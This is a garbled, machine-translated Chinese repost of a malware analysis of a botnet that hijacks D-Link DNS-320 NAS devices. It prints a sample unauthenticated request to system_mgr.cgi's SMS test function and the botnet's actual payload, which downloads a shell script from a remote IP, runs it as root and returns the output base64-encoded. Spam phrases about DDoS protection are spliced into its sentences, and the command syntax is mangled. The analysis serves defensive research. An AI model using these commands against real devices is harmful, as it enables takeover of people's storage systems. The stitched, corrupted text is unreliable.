来自 网络 2022-03-26 15:40 的文章

防ddos攻击_服务器防ddos攻击源码_零元试用

防ddos攻击_服务器防ddos攻击源码_零元试用

自去年12月在2019年Botconf大会上介绍我们的研究以来,我们很自豪地提供了我们所要求的所有细节。如果您拥有D-Link NAS或NVR设备,请关注网络安全或只对异国情调的物联网僵尸网络感兴趣;这个是给你的!一句警告的话——这篇文章深入了技术细节。享受!

电子存储的发展与个人计算机(PC)的发展并行。当时唯一的选择是一个全高的内部硬盘驱动器,重达10磅,容量以兆字节为单位,这种情况早已不复存在。硬盘驱动器的尺寸在缩小,容量在增长,外部机柜和连接选项在增加。随之而来的是需要同时从多台PC访问文件。答案是网络连接存储(NAS)解决方案。

再往前走,另一个愿望就是,如果有互联网连接,可以从世界上任何地方访问文件。有些人只是想把他们的暑假照片直接寄回家,以便安全储存——以防他们的手机意外碰到泳池——其他人则不得不在出差时查阅重要文件。NAS设备不再局限于本地网络,它们成功地在互联网上站稳了脚跟。

当搜索实验室就消费者级设备上的一段相当独特的恶意代码与我们接洽时,我们期待着另一个coin miner或Mirai克隆。相反,它被证明是不同的东西,一个精心设计的小规模僵尸网络,只针对NAS和NVR设备,利用四种不同的方法来控制其节点,并且具有非常特定的目的。

成为某物的一部分

安全研究人员的常见做法是简单地将物联网设备连接到互联网上,等待几个小时或几天——取决于多个因素,比如给定设备的流行度和"buggyness"——看看会发生什么。在本例中,采用了类似的方法,cc攻击防御方法,将基于社区的工具集安装到D-Link DNS-320设备上。在进行诊断调查时,该设备的默认功能集非常有限。例如,与路由器相比,没有像telnet或内置命令这样的预安装服务来获取正在运行的进程列表。这一缺陷使这些单位成为网络犯罪分子更具吸引力的目标。

互联网挂钩花了大约24小时才见效。列表中出现了一个名为"bdcheck"的新流程,以及一些熟悉的代理的名称。是时候调查他们是如何到达那里的,从哪里来的,国内高防CDN评价,以及意图是否如预期的那样是恶意的了。

图1-运行进程列表

图1-运行进程列表

利用新功能

这些设备的固件使用大量编译的CGI脚本作为其基本功能。在我们的案例中,负责通知管理的"system_mgr"组件中似乎存在一个漏洞[1]——恰恰在SMS处理代码中。DNS-320型号的初始v1.0固件在2010年该设备上市时未使用基于SMS的通知,但该功能在年底的v2.0固件更新中添加。SMS通知功能的添加引入了使攻击成为可能并最终导致僵尸网络感染的漏洞。

图2–SMS通知设置

图2–SMS通知设置

进一步调查"system_mgr"组件后,很明显存在多个问题底层代码。可以使用新引入的SMS接口,而无需身份验证,并通过发送精心编制的命令,这可能会导致设备上的远程代码执行(RCE)。

利用此漏洞的示例命令:

"http:///cgi bin/system\u mgr.cgi?cmd=cgi\u sms\u test&command1=ls"

问题在于处理传递给"cgi\u sms\u test"函数的参数。由于没有对值进行验证,因此它们将仅用作系统调用的参数。这将导致在具有root权限的设备上执行远程代码(RCE)。

图3–SMS测试功能

图3–SMS测试功能

这是在僵尸网络客户端部署command1时的实际利用尝试:

"/usr/bin/wget-无检查证书"https://94.102.52.85/db/dlink_install.sh"-O-|/bin/ash-x2> &1 | openssl enc-base64"

上述命令的目的是从远程位置检索外壳脚本-最初从Dropbox,后来从不同的C2服务器-执行它并以base64编码格式返回结果。从下载脚本的命名约定来看,这是专门为D-Link设备设计的。

我们认为,僵尸网络的运营商在从已知服务(如Shodan或Censys)收集的IP地址的帮助下,手动执行了初始攻击阶段。我们找不到任何指向设备对设备感染媒介的证据。

请注意,在某些固件调试版本中,通过SMS接口接收的所有命令(以及一些内部命令)都被记录到设备web根目录中名为"msg"的文件中。这也有助于揭示谷类僵尸网络或使用相同漏洞的任何其他对手的攻击企图。

安装脚本–设置新节点

感染过程被拆分为多个外壳脚本(一些大小接近30kb!)它们最初位于Dropbox用户帐户上。一旦启动,他们将尝试安装软件包管理器,否则该软件包管理器不是基本固件的一部分(由于上述功能有限)。成功安装软件包管理器后,免费防御ddos云,它将用于为下列服务部署更多软件包:

-VPN(Tinc)

-HTTP代理(Polipo)

-Socks代理(尼龙)

-SSH守护程序(Dropbear)